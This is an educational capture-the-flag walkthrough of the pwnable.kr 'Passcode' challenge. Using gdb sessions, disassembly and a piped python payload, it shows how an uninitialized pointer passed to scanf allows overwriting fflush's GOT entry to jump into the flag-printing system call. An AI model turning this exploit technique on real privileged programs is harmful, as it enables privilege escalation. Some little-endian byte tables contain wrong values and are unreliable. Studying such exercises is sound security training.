pwnable.kr (Passcode)

Tutorial Notes

What you’ll learn:

  • More sophisticated attacks into memory buffers
  • More sophisticated uses of gdb
  • Introduction to assembly code
  • Closer look at how data is stored in memory

Directions:

First visit pwnable.kr and click on the “Passcode” icon. Next we log in via ssh as per the instructions:

$ ssh passcode@pwnable.kr -p2222
passcode@pwnable.kr's password: 
 ____  __    __  ____    ____  ____   _        ___      __  _  ____  
|    \|  |__|  ||    \  /    ||    \ | |      /  _]    |  |/ ]|    \ 
|  o  )  |  |  ||  _  ||  o  ||  o  )| |     /  [_     |  ' / |  D  )
|   _/|  |  |  ||  |  ||     ||     || |___ |    _]    |    \ |    / 
|  |  |  `  '  ||  |  ||  _  ||  O  ||     ||   [_  __ |     \|    \ 
|  |   \      / |  |  ||  |  ||     ||     ||     ||  ||  .  ||  .  \
|__|    \_/\_/  |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|
                                                                     
- Site admin : daehee87.kr@gmail.com
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
passcode@ubuntu:~$ 

Next let’s orient ourselves: who are we? what’s in our directory:

passcode@ubuntu:~$ id
uid=1010(passcode) gid=1010(passcode) groups=1010(passcode)
passcode@ubuntu:~$ ls -l
total 16
-r--r----- 1 root passcode_pwn   48 Jun 26  2014 flag
-r-xr-sr-x 1 root passcode_pwn 7485 Jun 26  2014 passcode
-rw-r--r-- 1 root root          858 Jun 26  2014 passcode.c

Once again, the permission for flag are such that only the owner (root) or group (passcode_pwn) can read from it. We can see an executable file passcode that has curious permissions:

-r-xr-sr-x 1 root passcode_pwn 7485 Jun 26  2014 passcode

This looks similar to the suid (set user id on execute) permission from the Collision challenge, except the s is in the group field. This is the guid or “set group id on execute” permission. When passcode is run, it will take on group passcode_pwn. So if we run passcode, it will have the necessary privilege to access the flag. So now all we need to do is figure out how get it to read from the flag.

Let’s have a look at the passcode.c file:

#include <stdio.h>
#include <stdlib.h>

void login(){
	int passcode1;
	int passcode2;

	printf("enter passcode1 : ");
	scanf("%d", passcode1);
	fflush(stdin);

	// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
	printf("enter passcode2 : ");
        scanf("%d", passcode2);

	printf("checking...\n");
	if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
		exit(0);
        }
}

void welcome(){
	char name[100];
	printf("enter you name : ");
	scanf("%100s", name);
	printf("Welcome %s!\n", name);
}

int main(){
	printf("Toddler's Secure Login System 1.0 beta.\n");

	welcome();
	login();

	// something after login...
	printf("Now I can safely trust you that you have credential :)\n");
	return 0;	
}

Let’s start in the main() function. It calls two function: welcome() and login() and then prints a success message. Looking at welcome() doesn’t seem to reveal much: there’s simple code for you to enter your name, and print it back. In the login() we see a couple of places to enter a passcode, and then an if statement checking whether these passcodes equal some predetermined value. If so, the program will print the flag, otherwise the program will exit.

So what’s our strategy? Well, we could try to approach it the same as with the bof challenge: overrun the bounds of the name array in the welcome() function, and see if we can use this to rewrite the passcode1 and passcode2 variables in the login() function.

As before, it seems like it might be a good strategy to compile our own passcode binary with debugging information present. First let’s check:

passcode@ubuntu:~$ file passcode
passcode: setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=d2b7bd64f70e46b1b0eb7036b35b24a651c3666b, not stripped

Again we see it’s a 32-bit binary. As before we can create and work out of a temp directory and compile our own version:

passcode@ubuntu:~$ mkdir /tmp/mypasscode && cp passcode.c /tmp/mypasscode && cd /tmp/mypasscode
passcode@ubuntu:/tmp/mypasscode$ gcc -g -m32 passcode.c -o passcode
passcode.c: In function ‘login’:
passcode.c:9:8: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
  scanf("%d", passcode1);
        ^
passcode.c:14:15: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
         scanf("%d", passcode2);
               ^
passcode@ubuntu:/tmp/mypasscode$ 

Again we see compiler warnings. This could be useful. Let’s make a mental note and revisit this later.

Debugging passcode

Let’s start by running gdb and setting some breakpoints:

passcode@ubuntu:/tmp/mypasscode$ gdb passcode 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.04) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from passcode...done.
(gdb) 

If we run list 0 it will print out the source code with corresponding line numbers. Let’s setup some break points, shall we? First let’s maybe setup a breakpoint allowing us to examine the contents of name after has been written to (line 31):

(gdb) break 31
Breakpoint 1 at 0x804868d: file passcode.c, line 31.
(gdb) break 17
Breakpoint 2 at 0x8048608: file passcode.c, line 17.

Ok let’s run the program.

(gdb) run
Starting program: /tmp/mypasscode/passcode 
Toddler's Secure Login System 1.0 beta.
enter you name : abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890

Breakpoint 1, welcome () at passcode.c:31
31		printf("Welcome %s!\n", name);
(gdb) print name
$1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890\000\000\000\000\000`m\374\367(\334\377\377\340\336\376\367+`\347\367\000\000\000\000\000`\374\367\000`\374\367(\334\377\377"

Understanding how memory is laid out

Ok so we can see the 100 character array partially filled up with our input. But here’s a question: where is the name buffer stored in memory? Well we can find out by printing the contents of the pointer to name as follows:

(gdb) print &name
$2 = (char (*)[100]) 0xffffdba8

Ok, so name begins at address 0xffffdba8 and goes for 100 bytes. But here’s the next question: which direction does name get written? Well let’s find out! First let’s print the contents of the memory address 0xffffdba8. How should we do that? First, take a look at this article on examining memory addresses and data in gdb. We’ll use the x command (i.e., “examine”) to print 100 characters starting at 0xffffdba8:

(gdb) x/100c 0xffffdba8
0xffffdba8:	97 'a'	98 'b'	99 'c'	100 'd'	101 'e'	102 'f'	103 'g'	104 'h'
0xffffdbb0:	105 'i'	106 'j'	107 'k'	108 'l'	109 'm'	110 'n'	111 'o'	112 'p'
0xffffdbb8:	113 'q'	114 'r'	115 's'	116 't'	117 'u'	118 'v'	119 'w'	120 'x'
0xffffdbc0:	121 'y'	122 'z'	65 'A'	66 'B'	67 'C'	68 'D'	69 'E'	70 'F'
0xffffdbc8:	71 'G'	72 'H'	73 'I'	74 'J'	75 'K'	76 'L'	77 'M'	78 'N'
0xffffdbd0:	79 'O'	80 'P'	81 'Q'	82 'R'	83 'S'	84 'T'	85 'U'	86 'V'
0xffffdbd8:	87 'W'	88 'X'	89 'Y'	90 'Z'	48 '0'	49 '1'	50 '2'	51 '3'
0xffffdbe0:	52 '4'	53 '5'	54 '6'	55 '7'	56 '8'	57 '9'	48 '0'	0 '\000'
0xffffdbe8:	0 '\000'	0 '\000'	0 '\000'	0 '\000'	96 '`'	109 'm'	-4 '\374'	-9 '\367'
0xffffdbf0:	40 '('	-36 '\334'	-1 '\377'	-1 '\377'	-32 '\340'	-34 '\336'	-2 '\376'	-9 '\367'
0xffffdbf8:	43 '+'	96 '`'	-25 '\347'	-9 '\367'	0 '\000'	0 '\000'	0 '\000'	0 '\000'
0xffffdc00:	0 '\000'	96 '`'	-4 '\374'	-9 '\367'	0 '\000'	96 '`'	-4 '\374'	-9 '\367'
0xffffdc08:	40 '('	-36 '\334'	-1 '\377'	-1 '\377'

So from this we can see that the name buffer grows upward in memory, i.e., each successive byte is stored at the next larger memory address. This means that if name[0] is stored in address 0xffffdba8, then name[99] is stored in address 0xffffdba8 + 99 = 0xffffdc0b.

If you’d like to do arithmetic in hexidecimal, you can do it easily with Python:

passcode@ubuntu:/tmp/mypasscode$ python
Python 2.7.12 (default, Jul  1 2016, 15:12:24) 
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> x = int("ffffdba8",16) + 99
>>> print hex(x)
0xffffdc0b

So now we have a clear picture how name[] is laid out in memory:

Memory address  Contents           Write Direction
--------------  --------           ---------------
...             ...
0xffffdc0d      <something else>
0xffffdc0c      <something else>      (High)
0xffffdc0b      name[99]                ^
0xffffdc0a      name[98]               / \
0xffffdc09      name[97]                |
0xffffdc08      name[96]                |
...             ...                     |
0xffffdbab      name[3]                 |
0xffffdbaa      name[2]                 |
0xffffdba9      name[1]                 |
0xffffdba8      name[0]                 |
0xffffdba7      <something else>      (Low)
0xffffdba6      <something else>
...             ...

If you’d like a little memory aid to help you remember, think of the word “writeup.” That is, data is written upwards in memory.

Storing Integers as Little Endian

Character arrays are stored in memory in a straight forward way: each successive character occupies the next higher memory address. But what about integers? The particular architecture found in the passcode program is something called little endian, meaning the “little end” (i.e., low byte) of the integer gets stored first.

Here’s an illustration of “big end” vs. “little end.”

Decimal 305419896 is hex 0x12345678

Represented as bytes:

  The "big end"     The "little end"
  ^                 ^
  |                 |
0x12, 0x34, 0x56, 0x78

If an architecture is little endian, the little end gets stored first, which means:

Little endian means little end gets stored first:

0x12, 0x34, 0x56, 0x78
  ^     ^     ^     ^
  |     |     |     | This byte stored 1st
  |     |     | This byte stored 2nd
  |     | This byte stored 3rd
  | This byte stored 4th

The data is still written in an upward direction (i.e., in successively larger addresses). So the first byte is stored gets stored at address n, the second bytes is stored at the next higher address n+1, and so on.

We can try this out. Let’s load the integer 0x12345678 into memory starting at address 0xffffdba8:

(gdb) set {int}0xffffdba8 = 0x12345678

Now let’s examine the memory:

(gdb) x/x 0xffffdba8
0xffffdba8:	0x78
(gdb) x/x 0xffffdba9
0xffffdba9:	0x56
(gdb) x/x 0xffffdbaa
0xffffdbaa:	0x34
(gdb) x/x 0xffffdbab
0xffffdbab:	0x12

So just to visualize this a bit better, the integer 0x12345678 gets stored in memory like this:

Memory address      Contents
--------------      --------
...                 ...
0xffffdbad          <something else>
0xffffdbab          0x12
0xffffdbaa          0x34
0xffffdba9          0x56
0xffffdba8          0x78
0xffffdba6          <something else>
...          	    ...

So what? Well recall when we’re writing bytes into buffer, we’re writing from low to high. So if we wanted to write the integer 0x12345678 into memory we’d need to take the little endian-ness into account and order the byte array accordingly:

0x78, 0x56, 0x32, 0x12

Debugging the login() function

Let’s set a new break point in the login() function to see where the passcode1 and passcode2 variables are stored in memory. We can set a breakpoint right at the start of the login() function and then check their memory addresses:

(gdb) break 8
Breakpoint 1 at 0x80485a1: file passcode.c, line 8.
(gdb) run
Starting program: /tmp/mypasscode/passcode 
Toddler's Secure Login System 1.0 beta.
enter you name : abc123
Welcome abc123!

Breakpoint 1, login () at passcode.c:8
8		printf("enter passcode1 : ");
(gdb) print &passcode1
$1 = (int *) 0xffffdc08
(gdb) print &passcode2
$2 = (int *) 0xffffdc0c
(gdb) 

Well this is interesting. Notice passcode1 begins at 0xffffdc08. Since it’s an integer, it occupies 4 bytes growing upward in memory, i.e.,

Memory address		Contents
--------------		-------
0xffffdc0b 		passcode1 (greatest byte)
0xffffdc0a 		passcode1
0xffffdc09 		passcode1
0xffffdc08 		passcode1 (least byte)

But now recall back to our analysis of the name buffer in the welcome() function:

Memory address		Contents
--------------		-------
0xffffdc0b 		name[99]
0xffffdc0a 		name[98]
0xffffdc09 		name[97]
0xffffdc08 		name[96]

Interesting! The last 4 bytes of name overlap with passcode1.

Huh? How does that work? Well name and passcode1 are local variables living in two separate functions. Local variables are only allocated when the function is called. So by the time passcode1 is allocated, the name variable is no longer being used, and passcode1 essentially by coincidence got allocated to a region of memory that name had used previously.

So here’s another question: if we set the addresses 0xffffdc08-0b during the welcome() function, would those values still be there when the login function is called? Well let’s check. Let’s try entering a name consisting of 96 “.”s followed by “ABCD”. Then we’ll examine the contents of passcode1 using x/c, which tells gdb to print the memory contents as characters:

(gdb) run
Starting program: /tmp/mypasscode/passcode 
Toddler's Secure Login System 1.0 beta.
enter you name : ................................................................................................ABCD
Welcome ................................................................................................ABCD!

Breakpoint 2, login () at passcode.c:8
8		printf("enter passcode1 : ");
(gdb) x/c 0xffffdc08
0xffffdc08:	65 'A'
(gdb) x/c 0xffffdc09
0xffffdc09:	66 'B'
(gdb) x/c 0xffffdc0a
0xffffdc0a:	67 'C'
(gdb) x/c 0xffffdc0b
0xffffdc0b:	68 'D'
(gdb) 

Bingo! We can control the contents of passcode1 at the time the login() function is called.

The mistake here (well, one of the mistakes) is the programmer didn’t initialize passcode1, so whatever was living in memory from before just gets left there. Ok, this will be useful.

That Compiler Warning about scanf()

Recall back to when we compile the program, we received that compiler warning:

passcode.c:9:8: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
  scanf("%d", passcode1);

Let’s go look up what’s going on here. The scanf() function is accepting input from standard in. To understand this, you need to understand a bit about how pointers work.

First let’s see an example of how scanf reads an integer from standard in:

scanf ("%d", <address>)

The scanf tells the program to read bytes from standard input, interpret them in some specified format, and then store them somewhere in memory.

The %d tells the program to interpret the input as a signed integer, i.e., read an ASCII numeric value from standard in, interpret it as a 4 byte integer, and store it at the address specified by <address>.

Using scanf properly

So how do you specify an address? Well first we would allocate an integer in memory, and then point scanf to that location. Here’s an example of how to do it properly:

int i;
printf ("Enter your age: ");
scanf ("%d", &i);

The &i tells the program to lookup the memory address of integer i using the address-of operator &, and then write the 4 input bytes to memory beginning at that address.

Using scanf improperly

Look what happens in login(), however:

printf("enter passcode1 : ");
scanf("%d", passcode1);

The programmer has made a mistake. Recall scanf() will write the input to whatever address you give it. The correct action would be to lookup the address of passcode1 using &passcode1, i.e.,

scanf("%d", &passcode1);

But the programmer forgot the address-of operator. So instead of giving scanf the location of passcode1, you’re giving it the contents of passcode1!

But scanf is a dumb function… it’s going to write to whatever address you give it, so it’s going to treat the contents of passcode1 as the address to write to!

So as the attacker, if we could set the content of passcode1, we could make the program write an integer anywhere we want!

In summary

So to summarize what we have so far:

  • The name buffer overlaps with passcode1 allowing to write into passcode1
  • The programmer forgot to initialize passcode1 allowing us to control the contents of passcode
  • The programmer improperly instructs scanf to store bytes from standard input into the address pointed to by the contents of passcode1

Since we control the contents of passcode1 we can write an integer into any memory location we want (well.. with some constraints).

Hijacking a function call

Question: if you could write 4 bytes anywhere in memory, where would you write? What would you write? Well recall 4 bytes is enough to specify a memory address. So the “what” could be an address.

The next piece of the puzzle is to understand what happens when a function gets called. There’s a fair bit of detail here, but we’ll just skip to the part that’s relevant to us: when a function is called, the program has to jump to a location in memory containing the function’s code. That means a function call must specify an address to jump to. So if we could overwrite that address, we could cause the program to jump to anywhere we want and continue executing!

So what if we just jumped straight to the system call, bypassing the if statement all together? Let’s take a look.

For this we can use the disassemble command in gdb to disassemble the login function and see the memory addresses are associated with various operations:

(gdb) disassemble login
Dump of assembler code for function login:
   0x0804859b <+0>:	push   %ebp
   .
   .
   .
   0x0804862d <+146>:	push   $0x80487bf
   0x08048632 <+151>:	call   0x8048450 <system@plt>
   .
   .
   .

So if we could somehow cause the program to jump to address 0x0804862d, the next instruction to be executed would be the system call that would print the flag!

So which function call shall we hijack? Returning to the code, the operation immediately after the scanf is a function called fflush:

	printf("enter passcode1 : ");
	scanf("%d", passcode1);
	fflush(stdin);

So we could use the scanf to overwrite the address pointing to the start of the fflush code, causing the program to jump to the system call instead. Let’s disassemble fflush and see. Note the program should be halted (i.e., not paused at a breakpoint) when you do this:

(gdb) disassemble fflush
Dump of assembler code for function fflush@plt:
   0x08048420 <+0>:	jmp    *0x804a010
   0x08048426 <+6>:	push   $0x8
   0x0804842b <+11>:	jmp    0x8048400
End of assembler dump.

So the first instruction is jmp *0x804a010. The jmp instruction tells the program to jump to an address to continue execution. In this case the program will jump to the location of the fflush code and execute it.

So which address does it jump to? The “*” is called the indirection operator *0x804a010 is explained as the “address pointed to by 0x804a010”. In other words, go grab the 4 bytes stored in memory at addresses 0x804a010-0x804a013, and then jump to that address.

Ok, now we got it. We need to overwrite the contents in addresses 0x804a010-0x804a013 with the address of the system call. When the program loads the address to run the fflush code, it will instead load the address of the system call, and jump to that instead.

Recall the system call happens at address 0x0804862d, so our goal to write the following contents to memory:

Memory address		Contents
--------------		-------
0x804a013		0x32
0x804a012 		0x86
0x804a011 		0x04
0x804a010 		0x08

In Summary

When the program calls fflush, it goes and grabs the 4 bytes starting at 0x804a010. Normally this would cause the program to jump to the location of the fflush instructions. But we’ve rewritten the memory contents to the address of the system call. So when the program tries to jump to the fflush instructions, it will jump to the system call instead, which will print the flag.

Putting it all together

In summary we have 3 parts to our exploit:

  1. Filling the buffer enough to write into passcode1
  2. Filling passcode1 with the value 0x804a010 so scanf will store input to that address
  3. Filling address 0x804a010 with the address 0x0804862d so the fflush will jump to the system call printing the flag.

So as input into the program we need:

  1. 96 characters of filler (it doesn’t matter). Just enough bytes so we can set the last 4 bytes. Python makes it easy to generate a string of 96 characters:
96 * '.'
  1. The the address into which we can store the address to be jumped to, i.e., the bytes 0x08, 0x04, 0xa0, 0x10 in little endian. In Python this would be:
\x10\xa0\x04\x08
  1. The address to jump to, i.e. 0x0804862d. This value however must be delivered as an ASCII encoded decimal number, since the scanf() function is expecting the user to type it in. Let’s convert 0x0804862d to decimal. Using the Python interpreter we get:
>>> int("0804862d",16)
134514221

Putting this all together we have the Python command:

print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'

Ok, let’s input this into passcode:

passcode@ubuntu:/tmp/mypasscode$ python -c "print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'" | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome ................................................................................................!
/bin/cat: flag: No such file or directory
enter passcode1 : Now I can safely trust you that you have credential :)

It worked! But it didn’t print the flag (it says No such file or directory). That’s because we ran it on the version in /tmp/mypasscode. Now we need to run it on the real version in /home/passcode:

passcode@ubuntu:~$ cd /home/passcode
passcode@ubuntu:~$ python -c "print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'" | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome ................................................................................................!
enter passcode1 : enter passcode2 : checking...
Login Failed!

Hmm. This time it didn’t work. The specific memory addresses for the fflush call and the system call must be different.

GOAL: Your job is to disassemble the real passcode file and figure out what the correct addresses are, and then capture the flag!